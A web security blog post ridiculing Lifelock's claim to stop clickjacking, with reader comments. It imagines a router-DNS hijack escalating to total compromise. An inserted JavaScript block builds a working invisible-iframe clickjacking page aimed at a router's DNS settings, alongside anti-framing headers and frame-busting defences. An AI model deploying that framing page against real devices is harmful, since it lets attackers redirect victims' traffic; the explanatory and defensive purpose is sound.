web application security lab

Lifelock Protects You from Clickjacking

Well, now I’ve seen everything. Just when I thought I couldn’t be any more amazed by overselling and snake oil, I get hit with this. Apparently Lifelock now purports to protect you from clickjacking. For those of you who don’t recall, Lifelock is the service that protects your identity, except for that one time when it didn’t. But that’s neither here nor there, water under the bridge and all that. Here’s how Lifelock protects you from clickjacking…

You log into your home firewall/router and forget to log out. Then you wind up on some compromised website and someone clickjacks you (regardless of browser - I have no idea what that Lifelock comment means, since no browser has patched against it): the router’s admin page is loaded in an invisible frame, your click lands on its “save” button with your still-valid session, and you have just changed your DNS to use an attacker-controlled DNS server. Now every page you go to is effectively man-in-the-middled. But instead of taking over every page, the attacker takes over Google AdWords, since ad script runs on nearly every domain and that effectively XSSes all of them, and they can monetize their own sites in the process.
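The router-DNS clickjack in that paragraph, and the checks that stop it, as an added example (this is not code from the original post or from Lifelock): the attacker page frames the router admin UI transparently over a decoy button, and the defender functions return the anti-framing headers a site should send, test a header map the way a scanner would, and fall back to script-based frame-busting. The router URL, the pixel offset of its save button, and the decoy text are assumptions for illustration.

```javascript
// Added example, not part of the original post. Demonstrates the router-DNS
// clickjack described above and the checks that defeat it. The router URL,
// the position of its Save button and the decoy wording are assumptions.

// Assumed: the victim's router admin page, reachable with an ambient (still
// logged-in) session, so a real click on its Save button submits the DNS form.
// The simplest case assumes the DNS fields can be pre-filled from the query
// string; a real attacker may have to sequence several clicks instead.
const ROUTER_DNS_PAGE = "http://192.168.1.1/dns_settings.html?dns1=198.51.100.53";

// Attacker side: the framing page. The real admin UI is loaded in an iframe
// made fully transparent and stacked above a visible decoy, positioned so the
// router's Save button sits exactly under the decoy. The victim sees and
// clicks the decoy; the browser delivers the click to the invisible iframe.
function buildClickjackPage(targetUrl, decoyText, saveButtonOffset) {
  const { x, y } = saveButtonOffset; // where Save renders inside the framed page
  return [
    "<!doctype html><html><body>",
    // decoy the victim actually sees, at the same screen position as Save
    `<button style="position:absolute;left:${x}px;top:${y}px;z-index:1">${decoyText}</button>`,
    // the victim's real admin page: invisible but on top, so it receives the click
    `<iframe src="${targetUrl}" scrolling="no"`,
    '  style="position:absolute;left:0;top:0;width:1024px;height:768px;opacity:0;z-index:2;border:0">',
    "</iframe>",
    "</body></html>",
  ].join("\n");
}

// Defender side (1): headers that instruct the browser to refuse framing.
// X-Frame-Options is the older mechanism; CSP frame-ancestors supersedes it.
function antiFramingHeaders() {
  return {
    "X-Frame-Options": "DENY",
    "Content-Security-Policy": "frame-ancestors 'none'",
  };
}

// Defender side (2): a scanner-style check. Given a response header map, does
// the page permit being framed? Header names are matched case-insensitively.
function framingAllowed(headers) {
  const lower = {};
  for (const [k, v] of Object.entries(headers)) lower[k.toLowerCase()] = String(v);
  const xfo = (lower["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY" || xfo === "SAMEORIGIN" || xfo.startsWith("ALLOW-FROM")) return false;
  const csp = lower["content-security-policy"] || "";
  if (/(^|;)\s*frame-ancestors\s/i.test(csp)) return false;
  return true;
}

// Defender side (3): legacy JavaScript frame-busting for clients that ignore
// the headers. Takes a window-like object so it can be exercised outside a browser.
function isFramed(win) {
  try {
    return win.top !== win.self;
  } catch (e) {
    // Reading a cross-origin parent can throw; a throw means we are framed.
    return true;
  }
}

function frameBust(win) {
  if (!isFramed(win)) return false;
  // Caveat: script-based busting can be suppressed by the framing page (an
  // iframe sandbox without allow-top-navigation, or blocking the unload), so
  // it is a fallback to the headers above, not a replacement for them.
  win.top.location = win.self.location;
  return true;
}

// Stand-alone run: print the framing page and the headers the router should send.
if (typeof require !== "undefined" && require.main === module) {
  console.log(buildClickjackPage(ROUTER_DNS_PAGE, "Claim your prize", { x: 300, y: 420 }));
  console.log(antiFramingHeaders());
}
```

The attack works only because the router sends neither header and relies on an ambient session; `framingAllowed` is the check to run against any authenticated page that performs state-changing actions on a single click.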

Next the attacker begins stealing the credentials to your accounts, and unfortunately you aren’t very good at using unique passwords, not that it matters, since they can drive the forgot-password and change-password functions via XMLHttpRequests and credential theft/replay. Plus, since they own pretty much every web page you go to and you rarely patch Adobe Flash, they are now listening to your microphone through a second clickjack. Now, as you give up all your sensitive info on the phone with your bank, credit card companies and more, they are right there listening via their version of Back Orifice for the web - because that’s what we’re really talking about here with clickjacking, isn’t it?

Anyway, next the attacker figures out where you work and begins to infiltrate using webmail. Soon they have access to most of your life and have swapped malware in for something you thought you were downloading over HTTP (they control your DNS, so they control the download). Now, with their newly installed malware/keystroke logger, they have access through your corporate VPN tunnel and to all your online accounts, work-related or otherwise.

Then they begin to wire funds out of your account, attack your company, and use your machine as a child porn server, since they can put your computer in the DMZ, having long ago compromised the firewall/router by brute-forcing it from your own machine through their malware. Lastly, just for grins, they compromise your Lifelock account, since you log into it from the same compromised machine, and request to cancel it on your behalf.

So after the police come to your door to arrest you for proliferation of child pr0n (your wife leaving you for the same reason, of course) and for the added charge of industrial espionage against your own company, and you realize that your bank account has been raided and your identity has been stolen, at least you have someone to talk to over at the Lifelock helpline. Good luck getting your life put back together; I’m sure they’ll be very sympathetic with an incarcerated pervert who is awaiting trial and can only be reached at the federal holding facility, especially after you tried to cancel your account with them.

Yes, this is all a wildly over-dramatic scenario, but so is Lifelock’s statement. In their defense, they probably meant it only as it relates to identity theft, not understanding any of the other possibilities relating to clickjacking, or the hacking/security world as a whole for that matter. But isn’t that the point? If you don’t get it, you probably shouldn’t pretend you protect against it in any meaningful way. Consumers might not know the difference, but a hacker does.

18 Responses to “Lifelock Protects You from Clickjacking”

  1. Robert Says:

    As we say on the west coast that is ‘Hella Lame’.

  2. zero-cool Says:

    They know that the customer is an uneducated cow whose milk they should extract (rip off) entirely.

    Anyway, that is how marketing works, almost the same way you see it on TV shopping shows.

  3. thrill Says:

    I heard PhishCops also protects against clickjacking, along with flat tires and sore throats. Roadside service is available for an extra cost though.

  4. noname Says:

    some sceurety guy from grc.com says that noscrpt for firefox prevents clickjacking even while running “global schriping allowed”
    since I am not a wiz my self I can’t dessprove it. so i’m running whit it

    correct my gramma and figure out what I wrote

  5. somename Says:

    What noname said (grammar-corrected and all) was:

    The latest versions of the NoScript extension for the Mozilla Firefox web browser will protect against all known clickjacking attacks, even if scripting is allowed at that site, or even if allowed globally. Steve Gibson of Gibson Research Corporation, www.grc.com, announced this on his weekly podcast, Security Now!

    I would just add that audio and text transcripts of that podcast can be found at http://www.grc.com/SecurityNow.htm; download Episode #168 dated 30 Oct. 2008, and that I got the impression from Gibson that NoScript developer Giorgio Maone first heard about the CJ attack from you, RSnake/RHansen (that is whom we’re talking to here, right?). In which case, props to RS for responsible disclosure to Maone, the only guy on the planet who would do something about it, and props to Maone for jumping on it. (M$? Ha! Mac? Naa, he’s too busy making fun of the PC guy in the commercials. Opera? Here’s what they think is important:

    “What’s New?

    CheckOpera Link: Now lets you synchronize custom Search engines and typed History too. So any website address you typed in one computer will be available in all your other computers.”)

    Wow!!! … and get clickjacked on all your other machines.

    Anyway, the Fx/Ns combo is allegedly CJ-safe. Comments from the article’s author?

  6. Cagekicker Says:

    It nearly brings tears to my eyes and a warm, cozy feeling every time I see how on top of things Opera is… I don’t know how the hell I would survive if I weren’t able to synchronize all of my web browsing habits on all computers.

  7. somename Says:

    @ Cagekicker:
    My sentiments exactly. Well-said, bro!

    @noname:
    Dood, you gotta watch out for the notorious “cross-site-schriping” attack.

    @ Everyone:
    There shouldn’t have been a comma or semicolon at the end of the URLs for GRC and SecurityNow! Clicking gets you a 404 error. I didn’t realize that this site parses raw URLs into links without BBCode. Copy/paste without the comma or semicolon and you’re there. My bad.

  8. Human Says:

    @Robert

    lol

    i dont think this is good

  9. Asfasfos Says:

    If there are any Spanish readers of this blog, I’ve translated this entry on my blog (asfasfos[dot]com). Really nice post, by the way :)

  10. somename Says:

    @Asfasfos:
    A very good and important service, Sir/Madam/Miss!

  11. GFCM Says:

    Well.. you know.. I have this magic coin that protects me against dragons (and dinosaurs!).

    And it really works; as long as I keep that coin in my pocket I will never see a dragon.

    It really seems to be the same case. Users really believe that the “magic coin” or “Lifelock” can protect them from things they don’t understand (or, in the case of the dragon, that just don’t exist).

    Don’t know if I made my point clear.

  12. Grymstone Says:

    I think everyone agrees on the uselessness of lifelock.
    It’s been talked about well over the internet security news and forums about how ineffective it is. The guarantee might be good, but the security isn’t.

  13. Rafal Los Says:

    @RSnake: Snake oil and overselling… isn’t that Trey’s area of research? Anyway… good find. I see that idiotic commercial about the CEO of LifeLock on TV all the time, handing out his Social Security Number to everyone… I just want to punch the guy - but here’s the thing… they’re providing a service people are signing up to buy, which isn’t to say that it’s any good, just that they’re preying upon the right “fears and doubts” from scared people. I hate ambulance-chasers like these folks.

  14. onename Says:

    Kind of like with the first recession in the early 1940s: tell everyone the banks are going bankrupt so that everyone runs to the bank to withdraw all of their money, because of the fear that they will lose it all. Fear-induced marketing is one of the oldest tricks in the book, and while LifeLock will no doubt frighten the masses into using their service, it creates an even better feeling after they have been exploited.

  15. seehere Says:

    Actually if you knew your facts, they have never claimed to do this.

  16. RSnake Says:

    Funny, I thought I did know my facts and even pointed to the link where they said so on their corporate blog. :-/ Oh wait, I did!

  17. send9 Says:

    I read the whole article, and while terrible, there is no mention of LifeLock. Just their logo at the top of the page — the news story itself is not even on the LifeLock site. What am I missing?

  18. RSnake Says:

    @send9 - they changed the URL to do a 301 from the old page. Look at the URL before you click on it and it’ll give you a sense of what nonsense they were spouting originally.